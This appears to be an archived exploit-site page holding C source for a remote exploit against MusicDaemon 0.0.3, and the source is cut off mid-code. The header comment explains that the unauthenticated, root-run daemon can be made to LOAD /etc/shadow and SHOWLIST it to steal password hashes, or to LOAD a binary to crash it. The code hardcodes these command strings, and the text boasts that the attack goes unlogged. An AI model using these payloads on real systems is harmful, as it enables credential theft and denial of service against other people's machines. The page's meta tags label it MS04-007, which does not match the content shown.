K-OTik : MusicDaemon <meta content="MS04-007,Exploit" name="keywords"> <meta content="MS04-007 Exploit" name="description"> <meta http-equiv="MSThemeCompatible" content="Yes"> <style type="text/css"> BODY { SCROLLBAR-ARROW-COLOR: #204558; SCROLLBAR-BASE-COLOR: #bdbcbc } SELECT { FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } TEXTAREA { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } .bginput { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } A:link { COLOR: #000020; TEXT-DECORATION: none } A:visited { COLOR: #000020; TEXT-DECORATION: none } A:active { COLOR: #000020; TEXT-DECORATION: none } A:hover { COLOR: #000020; TEXT-DECORATION: none } #cat A:link { COLOR: #204558; TEXT-DECORATION: none } #cat A:visited { COLOR: #204558; TEXT-DECORATION: none } #cat A:active { COLOR: #204558; TEXT-DECORATION: none } #cat A:hover { COLOR: #204558; TEXT-DECORATION: none } #ltlink A:link { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:visited { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:active { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:hover { COLOR: #000020; TEXT-DECORATION: none } .thtcolor { COLOR: #204558 } .bordert { BORDER-RIGHT: #a9a9ac 1px solid; BORDER-TOP: #a9a9ac 1px solid; BORDER-LEFT: #a9a9ac 1px solid; BORDER-BOTTOM: #a9a9ac 1px solid } td {font-family:arial,helvetica,sans-serif;font-size:x-small;}.tableborder { border:1px solid #345487;background-color:#FFF; padding:0; margin:0;width:100%;align:center } .post2 { background-color: #EEF2F7 } .postcolor { font-size: 12px; line-height: 160% } table { border:0px none;border-spacing:0;border-collapse:collapse } </style>

MusicDaemon

/* MusicDaemon  
* 
* Hello 
*  
* ...... 
* bin:*:9797:0::::: 
* ftp:*:9797:0::::: 
* sshd:*:9797:0::::: 
* ...... 
* for privacy> 
* 
*  
* 
* root@vortex:~/test# 
* 
* Server Side View: 
* 
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p  1234 
* Using configuration: ../musicd.conf 
* [Mon May 17 05:26:07 2004] cmd_set() called 
* Binding to port 5555. 
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 1234. 
* [Mon May 17 05:26:11 2004] New connection! 
* [Mon May 17 05:26:11 2004] cmd_load() called 
* [Mon May 17 05:26:13 2004] cmd_show() called 
* [Mon May 17 05:26:20 2004] Client lost. 
* 
* 
* As you can see, it simply makes a connection, sends the commands, and 
* leaves. MusicDaemon doesn't even log that new connection's IPs that I 
* know of. Works very well, eh? :) 
* 
* The vulnerability is in where the is no authenciation for 1. For 2, it 
* will let you "LOAD" any file on the box if you have the correct privledges, 
* and by default, as I said before, it runs as root, unless you change the 
* configuration file to make it run as a different user. 
* 
* After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab 
* the contents of the actual file. You can subtitute any file you want in 
* for /etc/shadow, I just coded it to grab it because it being such an 
* important system file if you know what I mean ;). 
* 
* As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST", 
* it will crash music daemon. 
* 
* 
*/ 
  
  
#include  
#include  
#include  
#include  
#include  
  
int main(int argc, char *argv[]) { 
  
char buffer[16384]; 
  
char *xpldata1 = "LOAD /etc/shadow\r\n"; 
char *xpldata2 = "SHOWLIST\r\n"; 
char *xpldata3 = "CLEAR\r\n"; 
char *dosdata1 = "LOAD /bin/cat\r\n"; 
char *dosdata2 = "SHOWLIST\r\n"; 
char *dosdata3 = "CLEAR\r\n"; 
  
int len1 = strlen(xpldata1); 
int len2 = strlen(xpldata2); 
int len3 = strlen(xpldata3); 
int len4 = strlen(dosdata1); 
int len5 = strlen(dosdata2); 
int len6 = strlen(dosdata3); 
  
if(argc !=  4) { 
printf("\nMusicDaemon